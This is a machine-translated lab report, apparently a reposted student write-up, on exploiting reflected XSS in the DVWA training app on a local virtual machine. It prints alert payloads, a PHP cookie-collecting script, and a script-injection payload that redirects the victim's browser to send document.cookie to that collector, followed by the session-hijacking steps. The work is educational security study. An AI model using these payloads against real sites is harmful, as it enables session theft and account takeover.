Reflective XSS vulnerability

Hello everyone , I meet you again , I'm your friend, Quan Jun .

One 、 Experimental review

1. Purpose and requirements of the experiment

（1） Cross site scripts （XSS） XSS It's a kind of web Computer security in applications Loophole , It allows malice web The user injects code into a page that is available to other users . （2）XSS Vulnerabilities fall into three categories ： One is reflective XSS Loophole . The reasons causing ： There is no reliable input verification for the content submitted by users . One is preservation XSS Loophole . The reasons causing ： Without proper The filtering and purification will be saved in the back-end database The data submitted by the user is displayed to other users . The other is based on DOM Of XSS Loophole . Because of the client side JavaScript You can access the text object model of the browser （DOM）, therefore , It can determine the... Used to load the current page URL, A script published by the application can be downloaded from URL Extract data from , Process these data , Then use it to update the content of the page , If so , Applications are vulnerable to DOM Of XSS attack .

2. Experimental apparatus 、 Device or software

Vmware Workstation Pro 15.0
PHP study、DVWA
Windows 7 operating system 

3. Experimental principle

（1）XSS working principle ： XSS:Cross Site Script, For and cascading table (Cascading style sheet,CSS) Somewhat different , In the field of security, it is called “XSS”. XSS attack , Usually a hacker passes through “HTML Inject ” Tampered with the web page , A malicious script was inserted so that when users browse the web , An attack to control a user's browser . In the first place , The demonstration security of this attack is cross domain , So it's called “ Cross site scripts ”. But to this day , because JavaScript The powerful function of the website and the complexity of the front-end application , Whether it's cross domain is no longer important , For historical reasons ,XSS Keep it forever . （2）Web principle ： Two kinds of HTTP Request method ：GET and POST Request between client and server - Response time , The two most commonly used methods are ：GET and POST.GET – Request data from specified resources .POST – Submit the data to be processed to the specified resource .

Two 、 Experimental process （ Step process 、 Data records ）

1. step

（1） Turn on the virtual machine , Entering commands on the command line （ipconfig） Check out the IP Address .

（2） Open software phpstudy_pro, start-up Apache2.4.39 and MySQL5.7.26.

（3） Type... In your local browser ：http://192.168.45.128/DVWA-master/setup.php Get into DVWA page .

（4） take DVWA Security Set to Low

（5） Click on the left side of the XSS(reflected)

（6） stay DVWA Enter... In the address box ：http://192.168.45.128/DVWA-master/vulnerabilities/xss_r/?name=#

Show results , Go to the following page ：

Pop up window , That there is xss. Access from a host outside the virtual machine 192.168.45.128

（7） Access from a host outside the virtual machine 192.168.45.128 Address field input ：http://192.168.45.168/DVWA-master/vulnerabilities/xss_r/?name=zhangsan

The return page is shown below ：

Click... At the bottom right “View Source” The display page is as follows ：

Judge according to the echo information , The text displayed is Hello name . I People transport Enter into Of Letter Rest By save discharge stay name. The information we enter is stored in name variable .

（8） Add one JavaScript Code acquisition cookie, Enter , Click on “submit”, The following dialog box will pop up ：

You can see that the text information we submitted is executed by the browser , It shows our cookie Information . Description This website has XSS Loophole ！

（9） Enter in the text box <body οnlοad=alert(‘xss2’)>

（10） Enter... In the text box ：<a href=’’ οnclick=alert(‘xss3’)>click1

The results are as follows ：

Click on “click1”, The results are as follows ：

（11） In the virtual machine 192.168.45.128 Of WWW/DVWA-master Under the table of contents , newly build cookie1.php, The details are as follows ：

<?php
$cookie = $_GET['cookie']; // With GET How to get cookie A variable's value 
$fp = fopen('cookie.txt', 'a'); // open cookie.txt, If it doesn't exist, create it 
fwrite($fp,"my cookie is:".$cookie."\n"); // write file 
fclose($fp); // Close file 
?>

Enter the following in the text box of the client , Click on submit

<script>document.location='http://192.168.45.128/DVWA-master/cookie1.php?cookie='+document.cookie;</script>

stay DVWA-master Build in folder cookie.text, open cookie.txt, You can see the client cookie Values are saved in this text file

2. Data records

（1） Input ：
http://162.168.45.128/DVWA-master/vulnerabilities/xss_r/?name=<script>alert("1")</script>#
 Output ：
1	
（2） Input ：
http://192.168.45.128 /DVWA-master/vulnerabilities/xss_r/?name=zhangsan</script>
 Output ：
Hello zhangsan
（3） Input ：
<script> alert(document.cookie) </script>
 Output ：
security=low;PHPSESSID=6feglj7cp01c7mk04dndleb6r2
（4） Input ：
<body onload=alert('xss2')>
 Output ：
xss2
（5） Input ：
<a href='' onclick=alert('xss3')>click1</a>
 Output ：
Hello click1
（5） Input ：
<script>document.location='http://192.168.45.128/DVWA-master/cookie1.php?cookie='+document.cookie;</script>
 Output ：
 establish cookie.txt file 

3、 ... and 、 Result discussion and analysis

1. experimental result

Finally get the user's cookie Information ： my cookie is :security=low:PHPSESSID=6avva45en6mubmd3augjkcpjga

2. Analyze and discuss

This experiment was conducted in DVWA In a virtual environment , I learned xss The basic principle and steps of injection , How to use it xss Vulnerability to attack , How to get the user's cookie Information .

3. summary

reflective XSS Causes and steps of vulnerability ： reason ： The content entered by the user is not effectively verified step ： （1） Users log in normally , Get cookie （2） The attacker will be ready URL Submit to the user （3） User access attackers Provided URL （4） The impact of the server on the attacker JavaScript To respond to （5） Of the attacker JavaScript Execute in the user browser （6） The user browser sends a session token to the attacker （7） An attacker hijacks a user session , obtain cookie, Access the user's personal information and perform any operation with the user's permission .

Publisher ： Full stack programmer stack length , Reprint please indicate the source ：https://javaforall.cn/130940.html Link to the original text ：https://javaforall.cn